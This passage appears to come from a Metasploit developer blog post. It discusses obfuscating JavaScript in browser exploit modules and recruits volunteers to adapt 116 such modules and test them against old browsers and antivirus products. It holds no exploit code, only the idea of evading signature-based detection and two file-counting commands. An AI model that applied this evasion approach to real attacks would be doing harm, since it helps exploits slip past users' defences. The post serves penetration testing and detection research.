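Every call to buildSnippet yields different source for the same behaviour, which is the property a static signature on the CLSID or the variable names cannot survive; what it does not change is the object the page ends up creating, so a detection that instruments createElement/setAttribute at runtime still sees the CLSID in the clear.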

 

So now a call to arms. We could use some help testing 116 browser exploits to see if javascript obfuscation is viable, and several issues make that challenging. For one, getting hold of the vulnerable software is sometimes quite difficult. Also, in some cases where the vulnerability has very restrictive memory layout requirements, obfuscation may break the exploit.

 

What we need are people with old browsers and old plugins/toolbars/etc who can:

  • Modify exploit modules to use the new obfuscation techniques
  • Test their changes against as many versions of the vulnerable software as possible
  • Test their changes against any anti-virus that claims to protect web browsing

If you're interested in helping out, contact me in #metasploit on FreeNode, or @egyp7 on twitter.

 

 

[1] Gathered with the following commands:

  $ ls modules/exploits/*/browser/*.rb | wc -l
  152
  $ ls modules/exploits/*/browser/*.rb | xargs grep '<script' | wc -l
  116
